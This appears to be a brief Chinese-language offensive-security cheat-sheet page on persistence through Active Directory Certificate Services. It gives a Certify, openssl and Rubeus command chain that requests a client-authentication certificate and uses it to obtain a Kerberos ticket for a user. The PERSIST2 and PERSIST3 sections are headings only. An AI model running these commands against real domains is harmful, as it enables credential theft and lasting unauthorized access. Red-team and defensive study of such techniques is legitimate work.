AD CS Account Persistence
使用证书理解活动用户凭据窃取 - PERSIST1
Certify.exe find /clientauthCertify.exe request /ca:CA-SERVER\CA-NAME /template:TEMPLATE-NAMEopenssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxRubeus.exe asktgt /user:harmj0y /certificate:C:\Temp\cert.pfx /password:CertPass!使用证书获得机器持久性 - PERSIST2
通过证书更新延长持久性 - PERSIST3
最后更新于